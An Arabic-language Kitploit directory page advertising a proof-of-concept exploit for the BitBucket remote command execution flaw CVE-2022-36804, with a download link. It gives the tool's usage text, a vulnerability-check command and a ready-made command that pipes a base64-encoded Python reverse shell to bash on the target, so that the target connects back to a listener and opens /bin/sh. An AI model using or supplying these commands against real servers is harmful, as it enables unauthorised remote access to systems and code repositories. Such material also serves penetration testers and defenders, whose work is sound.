Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-36804 — استغلال حقيقي لـ BitBucket RCE CVE-2022-36804 | Kitploit
أدوات/GitHubGitHub/notdls/cve-2022-36804
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرأداة الوصول عن بعد
GitHubnotdls/cve-2022-36804

CVE-2022-36804

استغلال حقيقي لـ BitBucket RCE CVE-2022-36804

عرض المستودع
357منذ سنة واحدةتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-36804 برهان المفهوم

يحتوي هذا المستودع على برهان مفهوم بسيط للاستغلال لثغرة تنفيذ الأوامر عن بُعد في BitBucket (CVE-2022-36804). يتطلب استغلال هذه الثغرة الوصول إلى مستودع على المثيل المستهدف، إذا لم يكن لديك بيانات اعتماد، فسيحتاج الهدف إلى مستودعات عامة.

الاستخدام

root@kitploit:~
usage: exploit.py [-h] -p PROJECT -r REPO -u URL [-c COMMAND] [--proxy PROXY] [--session SESSION]
                  [--check]

Exploits the CVE-2022-36804 RCE in vulnerable BitBucket instances (< v8.3.1)

optional arguments:
  -h, --help            show this help message and exit
  -p PROJECT, --project PROJECT
                        The name of the project the public repository resides in (E.g.
                        testproject)
  -r REPO, --repo REPO  The name of the public repository (E.g. testrepo)
  -u URL, --url URL     The URL of the BitBucket server (E.g. http://localhost:7990/)
  -c COMMAND, --command COMMAND
                        The command to execute on the server (E.g. 'curl http://canary.domain/')
  --proxy PROXY         HTTP proxy to use for debugging (E.g. http://localhost:8080/)
  --session SESSION     The value of your 'BITBUCKETSESSIONID' cookie, required if your target
                        repo is private. (E.g. 3DD8B1EBA3763AD2611F4940BD870865)
  --check               Only perform a check to see if the instance is vulnerable

أمثلة

التحقق مما إذا كان المثيل معرضًا للخطر

للتحقق مما إذا كان المثيل معرضًا للخطر، يمكنك تنفيذ الأمر التالي

root@kitploit:~
python3 exploit.py -p PROJECT -r REPO -u http://target.site/ --check

إنشاء شل عكسي

يمكن استخدام الأمر أدناه لإنشاء شل عكسي على الضحية (ستحتاج حمولة base64 إلى التحديث بتفاصيل المستمع الخاص بك)

root@kitploit:~
python3 exploit.py -p PROJECT -r REPO -u http://localhost:7990/ -c "echo 'cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxvcyxwdHk7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTkyLjE2OC42Ny4zIiw4ODg4KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7cHR5LnNwYXduKCIvYmluL3NoIikn' | base64 -d  | bash |"

الإسناد

  • TheGrandPew - تحديد الثغرة والإبلاغ عنها

إخلاء مسؤولية

هذا الاستغلال مخصص للأغراض التعليمية/البحثية، وأنا لست مسؤولًا عن كيفية استخدام الناس له. كن لطيفًا :)

تنزيل الأداة